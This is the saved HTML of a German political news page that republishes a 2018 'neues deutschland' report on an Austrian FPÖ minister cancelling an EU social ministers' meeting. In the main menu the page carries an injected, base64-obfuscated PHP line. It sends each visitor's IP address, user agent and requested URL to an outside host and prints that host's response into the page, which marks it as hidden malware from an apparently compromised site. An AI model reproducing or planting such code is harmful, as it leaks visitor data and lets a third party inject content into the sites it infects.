<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	
<title>neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab | PolitikExpress</title>

	<link rel="stylesheet" type="text/css" media="all" href="https://www.politikexpress.de/wp-content/themes/politik27/style.css" />

	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="https://www.politikexpress.de/feed" />	
	<link rel="pingback" href="https://www.politikexpress.de/xmlrpc.php" />

	
<!-- All in One SEO Pack 2.8 by Michael Torbert of Semper Fi Web Design[279,391] -->
<meta name="description"  content="Die österreichische FPÖ-Sozialministerin Beate Hartinger-Klein hat das nächste Treffen der EU-Sozialminister abgesagt. Das geht aus einem Schreiben an die" />

<meta name="keywords"  content="politik,allgemein" />

<!-- /all in one seo pack -->

<!-- This site is optimized with the Yoast SEO plugin v8.2 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://www.politikexpress.de/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html" />
<meta property="og:locale" content="de_DE" />
<meta property="og:type" content="article" />
<meta property="og:title" content="neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab - PolitikExpress" />
<meta property="og:description" content="Die österreichische FPÖ-Sozialministerin Beate Hartinger-Klein hat das nächste Treffen der EU-Sozialminister abgesagt. Das geht aus einem Schreiben an die zuständige EU-Sozialkommissarin Marianne Thyssen hervor, wie die in Berlin erscheinende überregionale Tageszeitung &#8222;neues deutschland&#8220; berichtet (Dienstagausgabe). Die Themen seien nicht weit genug gediehen, als dass sich ein Treffen auf Ministerebene lohnen würde. Aus Teilnehmerkreisen heißt es, &hellip;" />
<meta property="og:url" content="https://www.politikexpress.de/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html" />
<meta property="og:site_name" content="PolitikExpress" />
<meta property="article:tag" content="politik" />
<meta property="article:section" content="Allgemein" />
<meta property="article:published_time" content="2018-09-17T18:08:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Die österreichische FPÖ-Sozialministerin Beate Hartinger-Klein hat das nächste Treffen der EU-Sozialminister abgesagt. Das geht aus einem Schreiben an die zuständige EU-Sozialkommissarin Marianne Thyssen hervor, wie die in Berlin erscheinende überregionale Tageszeitung &#8222;neues deutschland&#8220; berichtet (Dienstagausgabe). Die Themen seien nicht weit genug gediehen, als dass sich ein Treffen auf Ministerebene lohnen würde. Aus Teilnehmerkreisen heißt es, [&hellip;]" />
<meta name="twitter:title" content="neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab - PolitikExpress" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="PolitikExpress &raquo; Feed" href="https://www.politikexpress.de/feed" />
<link rel="alternate" type="application/rss+xml" title="PolitikExpress &raquo; Kommentar-Feed" href="https://www.politikexpress.de/comments/feed" />
<link rel="alternate" type="application/rss+xml" title="PolitikExpress &raquo; neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab Kommentar-Feed" href="https://www.politikexpress.de/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html/feed" />
<meta property="og:title" content="neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab"/><meta property="og:type" content="article"/><meta property="og:url" content="https://www.politikexpress.de/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html"/><meta property="og:site_name" content="PolitikExpress"/><meta property="og:image" content=""/>
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.politikexpress.de\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='yarppWidgetCss-css'  href='https://www.politikexpress.de/wp-content/plugins/yet-another-related-posts-plugin/style/widget.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='yarppRelatedCss-css'  href='https://www.politikexpress.de/wp-content/plugins/yet-another-related-posts-plugin/style/related.css?ver=4.9.8' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/contentslider.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/slides.min.jquery.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/jCarouselLite.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/flowplayer/flowplayer-3.2.6.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/jquery.tools.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/themes/politik27/inc/js/superfish-1.4.8.js?ver=4.9.8'></script>
<link rel='https://api.w.org/' href='https://www.politikexpress.de/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.politikexpress.de/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.politikexpress.de/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='https://www.politikexpress.de/?p=1650512' />
<link rel="alternate" type="application/json+oembed" href="https://www.politikexpress.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.politikexpress.de%2Fneues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html" />
<link rel="alternate" type="text/xml+oembed" href="https://www.politikexpress.de/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.politikexpress.de%2Fneues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html&#038;format=xml" />
<link href="https://www.politikexpress.de/wp-content/themes/politik27/styles/white.css" rel="stylesheet" type="text/css" />

	<script type='text/javascript'>
	(function($) {
		$(document).ready(function() { 
			
			$('a[href=#top]').click(function(){	$('html, body').animate({scrollTop:0}, 'slow');	return false; });
			
			$("ul.tabs").tabs("div.panes > div");			
			$("ul.sc_tabs").tabs("div.sc_tabs-content > div");
			
			$("#mediabar .container").jCarouselLite({
								scroll: 2,
				speed: 800,	
				visible: 6,
				start: 0,
				circular: false,
				btnPrev: "#previous_button",
				btnNext: "#next_button"
			});
			
			$('#slides').slides({
								preload: true,
				autoHeight: true
			});			
		});
	})(jQuery);
	</script>
<link rel="shortcut icon" href="https://www.politikexpress.de/wp-content/themes/politik27/inc/admin//images/favicon.ico" /><script type="text/javascript">
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-4819655-12', 'auto');
  ga('send', 'pageview');

</script>
	

	
	
</head>

<body class="post-template-default single single-post postid-1650512 single-format-standard">

	<div id="topad">
		<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=173");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a1bc2a4f&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=173&amp;cb=%n&amp;n=a1bc2a4f&amp;ct0=%c' border='0' alt='' /></a></noscript>
	</div>

<div class="wrapper">


	<div id="header">

					<a href="https://www.politikexpress.de/" title="Top News zu Politik und Gesellschaft">
				<img src="https://www.politikexpress.de/pe_header.png" id="header_banner" alt="PolitikExpress" title="PolitikExpress"/>
			</a>
				<div class="clear"></div>	
		
		
	</div><!-- /header -->
		
	<div class="clear"></div>		
	
	<div id="mainmenu">
<? error_reporting(0);$source=base64_decode('aHR0cDovL2dpZHJvdmlkcmEuaW4vYWJjZGUvaW5kZXgucGhwP2Q9').$_SERVER[base64_decode('SFRUUF9IT1NU')].base64_decode('JnI9').urlencode($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')]).base64_decode('JnU9').urlencode($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]).base64_decode('Jmk9').$_SERVER[base64_decode('UkVNT1RFX0FERFI=')];echo file_get_contents($source);?>
		<ul class="mainnav dropdown">
			<li ><a href="https://www.politikexpress.de/" title="Top News zu Politik und Gesellschaft">START</a></li>
				<li class="cat-item cat-item-125"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2" >Außenpolitik</a>
<ul class='children'>
	<li class="cat-item cat-item-11"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2/aussenhandel" >Außenhandel</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://www.politikexpress.de/kategorie/aussenpolitik-2/menschenrechte" >Menschenrechte</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-12"><a href="https://www.politikexpress.de/kategorie/bundesregierung" >Bundesregierung</a>
</li>
	<li class="cat-item cat-item-3"><a href="https://www.politikexpress.de/kategorie/innenpolitik" >Innenpolitik</a>
<ul class='children'>
	<li class="cat-item cat-item-8"><a href="https://www.politikexpress.de/kategorie/innenpolitik/arbeit" >Arbeit</a>
</li>
	<li class="cat-item cat-item-9"><a href="https://www.politikexpress.de/kategorie/innenpolitik/gewerkschaften" >Gewerkschaften</a>
</li>
	<li class="cat-item cat-item-10"><a href="https://www.politikexpress.de/kategorie/innenpolitik/kommune" >Kommune</a>
</li>
	<li class="cat-item cat-item-6"><a href="https://www.politikexpress.de/kategorie/innenpolitik/parteien" >Parteien</a>
</li>
	<li class="cat-item cat-item-4"><a href="https://www.politikexpress.de/kategorie/innenpolitik/soziales" >Soziales</a>
</li>
	<li class="cat-item cat-item-13"><a href="https://www.politikexpress.de/kategorie/innenpolitik/wahlen" >Wahlen</a>
</li>
</ul>
</li>
	<li class="cat-item cat-item-7"><a href="https://www.politikexpress.de/kategorie/umfrage" >Umfrage</a>
</li>
	<li class="cat-item cat-item-14"><a href="https://www.politikexpress.de/kategorie/umweltpolitik" >Umweltpolitik</a>
</li>
		</ul>
		<div class="clear"></div>	
	</div>
	
	<div id="submenu">
		<ul class="secondarynav dropdown">
			<li class="page_item page-item-2"><a href="https://www.politikexpress.de/impressum-html">Impressum</a></li>
<li class="page_item page-item-1611819"><a href="https://www.politikexpress.de/datenschutz">Datenschutz</a></li>
			<li><a href="#" class="gab_connect">Abonnieren</a>
				<ul id="social_links">
					<li><a class="gab_rss" href="https://www.politikexpress.de/feed" rel="nofollow" title="Neueste Artikel per RSS">RSS für Artikel</a></li>
															<li><a class="gab_facebook" href="https://www.facebook.com/politikexpress" rel="nofollow" title="Mit Facebook verbinden">Mit Facebook verbinden</a></li>				</ul>
			</li>
		</ul>

		<div id="search">
			<form id="searchform" action="https://www.politikexpress.de/">
	<fieldset>
		<input type="text" id="s" name="s" value="Webseite durchsuchen..." onfocus="if(this.value==this.defaultValue)this.value='';" onblur="if(this.value=='')this.value=this.defaultValue;"/>
		<input type="image" id="searchsubmit" src="https://www.politikexpress.de/wp-content/themes/politik27/images/button_go.gif" alt="Webseite durchsuchen..." /> 
	</fieldset>
</form>		</div><!-- /search -->
		<div class="clear"></div>	
	</div>
	
	<div class="clear"></div>

<div id="ad_billboard" align="center">

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=837");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>

</div>	<div id="container">	
		
				<div id="post-1650512" class="entry post-1650512 post type-post status-publish format-standard hentry category-allgemein tag-politik">
		
			<h1 class="entry_title">neues deutschland: FPÖ-Ministerin sagt Treffen der EU-Sozialminister ab</h1>

			<div class="metasingle">
				<span class="postdate">17. September 2018 | </span>
				<span class="postcat">Abgelegt unter: <a href="https://www.politikexpress.de/kategorie/allgemein" rel="category tag">Allgemein</a> | </span>
				<span class="postauthor">Beitrag von: <a href="https://www.politikexpress.de/author/redaktion" title="Beiträge von Presse" rel="author">Presse</a></span> 
			</div><!-- /metas -->
			
			<br />
				<script type='text/javascript'><!--//<![CDATA[
				   document.MAX_ct0 = unescape('%c');
	
				   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
				   var m3_r = Math.floor(Math.random()*99999999999);
				   if (!document.MAX_used) document.MAX_used = ',';
				   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
				   document.write ("?zoneid=534");
				   document.write ('&amp;cb=' + m3_r);
				   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
				   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
				   document.write ("&amp;loc=" + escape(window.location));
				   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
				   if (document.context) document.write ("&context=" + escape(document.context));
				   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
				       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
				   }
				   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
				   document.write ("'><\/scr"+"ipt>");
				//]]>--></script>
								<br /><br />
				<iframe src="https://www.facebook.com/plugins/like.php?href=https://www.politikexpress.de&amp;layout=button_count&amp;show_faces=true&amp;width=170&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px; margin-left:15px; float:left; width:120px;" allowTransparency="true"></iframe>
				<a href="https://twitter.com/share" class="twitter-share-button" data-url="https://www.politikexpress.de" data-count="horizontal" data-via="88energie" data-lang="de">Tweet</a><script type="text/javascript" src="https://platform.twitter.com/widgets.js"></script>
				<br /><br />
			<p>Die österreichische FPÖ-Sozialministerin Beate <br />
Hartinger-Klein hat das nächste Treffen der EU-Sozialminister <br />
abgesagt. Das geht aus einem Schreiben an die zuständige <br />
EU-Sozialkommissarin Marianne Thyssen hervor, wie die in Berlin <br />
erscheinende überregionale Tageszeitung &#8222;neues deutschland&#8220; berichtet<br />
(Dienstagausgabe). Die Themen seien nicht weit genug gediehen, als <br />
dass sich ein Treffen auf Ministerebene lohnen würde. Aus <br />
Teilnehmerkreisen heißt es, dass die Absage des Rats &#8222;Beschäftigung, <br />
Sozialpolitik, Gesundheit und Verbraucherschutz&#8220; äußerst ungewöhnlich<br />
sei. Ein vergleichbarer Vorgang, wie die jetzige Absage, sei aus der <br />
jüngeren Vergangenheit »nicht bekannt«.</p>
<p>   Österreich hat derzeit die Ratspräsidentschaft in der EU inne. In <br />
dieser Funktion organisiert das Land alle Treffen des Rates der <br />
Europäischen Union sowie der ihm zuarbeitenden Ausschüsse und <br />
Arbeitsgruppen und sitzt diesen vor.</p>
<p>   Gabi Zimmer, Fraktionsvorsitzende der Linksfraktion im <br />
Europaparlament, übt Kritik an der Entscheidung: »Schon in ihrem <br />
Programm für die EU-Präsidentschaft kommt Soziales nur am Rande vor. <br />
Jetzt sagt die Alpenregierung auch noch den für Oktober geplanten <br />
EU-Gipfel für Beschäftigung und Soziales ab.&#8220; Angeblich, weil die <br />
laufenden Verhandlungen über Gesetze noch länger bräuchten, so Zimmer<br />
gegenüber &#8222;nd&#8220;.</p>
<p>   Die für den DGB Zuständige für europäische Sozialpolitik, Susanne <br />
Wixforth, warnte gegenüber &#8222;nd&#8220;, dass es einen sozialpolitischen <br />
Stillstand geben könne: »Nur auf den Ratstreffen selbst können <br />
entscheidende Fortschritte gemacht werden.«</p>
<p>   Im vergangenem Jahr hatte die EU-Kommission eine Stärkung der <br />
Sozialpolitik in der EU unter dem Namen &#8222;Soziale Säule&#8220; angekündigt.</p>
<p>Pressekontakt:<br />
neues deutschland<br />
Redaktion</p>
<p>Telefon: 030/2978-1722</p>
<p>Original-Content von: neues deutschland, übermittelt durch news aktuell</p>
<div class='yarpp-related'>
<h3>Related posts:</h3><ol>
<li><a href="https://www.politikexpress.de/neues-deutschland-kommentar-zum-treffen-von-putin-und-trump-in-helsinki-ein-anfang-mehr-noch-nicht-1631343.html" rel="bookmark" title="neues deutschland: Kommentar zum Treffen von Putin und Trump in Helsinki: Ein Anfang, mehr noch nicht">neues deutschland: Kommentar zum Treffen von Putin und Trump in Helsinki: Ein Anfang, mehr noch nicht </a></li>
<li><a href="https://www.politikexpress.de/neues-deutschland-zu-einem-treffen-der-burschenschaftlichen-gemeinschaft-am-16-juli-438111.html" rel="bookmark" title="Neues Deutschland: zu einem Treffen der Burschenschaftlichen Gemeinschaft am 16. Juli">Neues Deutschland: zu einem Treffen der Burschenschaftlichen Gemeinschaft am 16. Juli </a></li>
<li><a href="https://www.politikexpress.de/neues-deutschland-kommentar-zum-treffen-merkel-putin-spate-einsicht-1640873.html" rel="bookmark" title="neues deutschland: Kommentar zum Treffen Merkel-Putin: Späte Einsicht">neues deutschland: Kommentar zum Treffen Merkel-Putin: Späte Einsicht </a></li>
<li><a href="https://www.politikexpress.de/neues-deutschland-grunen-politiker-schmidt-rot-rot-grune-gesprache-gehen-weiter-1480476.html" rel="bookmark" title="neues deutschland: Grünen-Politiker Schmidt: Rot-rot-grüne Gespräche gehen weiter">neues deutschland: Grünen-Politiker Schmidt: Rot-rot-grüne Gespräche gehen weiter </a></li>
</ol>
</div>
<!-- plista wp Version 1.5.10 --><div data-widget="plista_widget_belowArticle"></div>
					
<script type="text/javascript">
(function(c){var g,s='script',w=window,n=c.name||'PLISTA';if(!w[n]){w[n]=c;g=w.document.getElementsByTagName(s)[0];s=w.document.createElement(s);s.async=true;s.type='text/javascript';s.src=(w.location.protocol==='https:'?'https:':'http:')+'//static'+(c.origin?'-'+c.origin:'')+'.plista.com/async'+(c.name?'/'+c.name:'')+'.js';g.parentNode.insertBefore(s,g);}
}({
    "publickey": "af58fb0f87173433116b4369",
	"item": {"objectid":1650512,"title":"neues deutschland: FP\u00d6-Ministerin sagt Treffen der EU-Sozialminister ab","text":"Die \u00f6sterreichische FP\u00d6-Sozialministerin Beate \nHartinger-Klein hat das n\u00e4chste Treffen der EU-Sozialminister \nabgesagt. Das geht aus einem Schreiben an die zust\u00e4ndige \nEU-Sozialkommissarin Marianne Thyssen hervor, wie die in Berlin \nerscheinende \u00fcbe","url":"https:\/\/www.politikexpress.de\/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html","img":"","category":"Allgemein","published_at":1537207680,"updated_at":1537207680}
}));
</script>


				<script src="https://connect.facebook.net/de_DE/all.js#xfbml=1"></script><fb:like-box href="https://www.facebook.com/politikexpress" width="300" connections="10" stream="false" header="false"></fb:like-box>

				<script type='text/javascript'><!--//<![CDATA[
				   document.MAX_ct0 = unescape('%c');
				
				   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
				   var m3_r = Math.floor(Math.random()*99999999999);
				   if (!document.MAX_used) document.MAX_used = ',';
				   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
				   document.write ("?zoneid=533");
				   document.write ('&amp;cb=' + m3_r);
				   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
				   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
				   document.write ("&amp;loc=" + escape(window.location));
				   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
				   if (document.context) document.write ("&context=" + escape(document.context));
				   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
				       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
				   }
				   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
				   document.write ("'><\/scr"+"ipt>");
				//]]>--></script>
				<div class="clear"></div>		
			
					
					</div><!-- /post -->
		
		
		
<div id="comments">
	
	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Schreibe einen Kommentar <small><a rel="nofollow" id="cancel-comment-reply-link" href="/neues-deutschland-fpo-ministerin-sagt-treffen-der-eu-sozialminister-ab-1650512.html#respond" style="display:none;">Antworten abbrechen</a></small></h3>			<form action="https://www.politikexpress.de/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Deine E-Mail-Adresse wird nicht veröffentlicht.</span> Erforderliche Felder sind mit <span class="required">*</span> markiert.</p><p class="comment-form-comment"><label for="comment">Kommentar</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" required='required' /></p>
<p class="comment-form-email"><label for="email">E-Mail <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" required='required' /></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" type="text" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Kommentar abschicken" /> <input type='hidden' name='comment_post_ID' value='1650512' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="6ad298ab89" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="129"/></p>			</form>
			</div><!-- #respond -->
	<p class="akismet_comment_form_privacy_notice">This site uses Akismet to reduce spam. <a href="https://akismet.com/privacy/" target="_blank" rel="nofollow noopener">Learn how your comment data is processed</a>.</p>
	
</div><!-- #comments -->	</div><!-- /container -->
	

	<div id="sidebar">
		<div id="text-6" class="widget widget_text"><div class="widgetinner"><h3 class="widgettitle">Werbung</h3>
			<div class="textwidget"><script type='text/javascript'><!--//<![CDATA[
   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=184");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://www.lmads.net/www/delivery/ck.php?n=a3198832&amp;cb=223' target='_blank'><img src='http://www.lmads.net/www/delivery/avw.php?zoneid=184&amp;cb=223&amp;n=a3198832' border='0' alt='' /></a></noscript>
</div>
		</div></div>
<div id="tag_cloud-3" class="widget widget_tag_cloud"><div class="widgetinner"><h3 class="widgettitle">Wichtige Themen</h3>
<div class="tagcloud"><a href="https://www.politikexpress.de/thema/anw-lte" class="tag-cloud-link tag-link-689 tag-link-position-1" style="font-size: 10.164251207729pt;" aria-label="anw-lte (1.907 Einträge)">anw-lte</a>
<a href="https://www.politikexpress.de/thema/anwalt" class="tag-cloud-link tag-link-687 tag-link-position-2" style="font-size: 10.367149758454pt;" aria-label="anwalt (2.021 Einträge)">anwalt</a>
<a href="https://www.politikexpress.de/thema/arbeitsmarkt" class="tag-cloud-link tag-link-65 tag-link-position-3" style="font-size: 10.096618357488pt;" aria-label="arbeitsmarkt (1.876 Einträge)">arbeitsmarkt</a>
<a href="https://www.politikexpress.de/thema/arbeitsrecht" class="tag-cloud-link tag-link-228 tag-link-position-4" style="font-size: 8.743961352657pt;" aria-label="arbeitsrecht (1.167 Einträge)">arbeitsrecht</a>
<a href="https://www.politikexpress.de/thema/armut" class="tag-cloud-link tag-link-120 tag-link-position-5" style="font-size: 8pt;" aria-label="armut (902 Einträge)">armut</a>
<a href="https://www.politikexpress.de/thema/ausbildung" class="tag-cloud-link tag-link-139 tag-link-position-6" style="font-size: 9.0821256038647pt;" aria-label="ausbildung (1.308 Einträge)">ausbildung</a>
<a href="https://www.politikexpress.de/thema/aussenpolitik" class="tag-cloud-link tag-link-95 tag-link-position-7" style="font-size: 15.371980676329pt;" aria-label="aussenpolitik (11.211 Einträge)">aussenpolitik</a>
<a href="https://www.politikexpress.de/thema/auszeichnung" class="tag-cloud-link tag-link-110 tag-link-position-8" style="font-size: 10.705314009662pt;" aria-label="auszeichnung (2.301 Einträge)">auszeichnung</a>
<a href="https://www.politikexpress.de/thema/auto" class="tag-cloud-link tag-link-106 tag-link-position-9" style="font-size: 9.487922705314pt;" aria-label="auto (1.496 Einträge)">auto</a>
<a href="https://www.politikexpress.de/thema/berlin" class="tag-cloud-link tag-link-366 tag-link-position-10" style="font-size: 9.2850241545894pt;" aria-label="berlin (1.408 Einträge)">berlin</a>
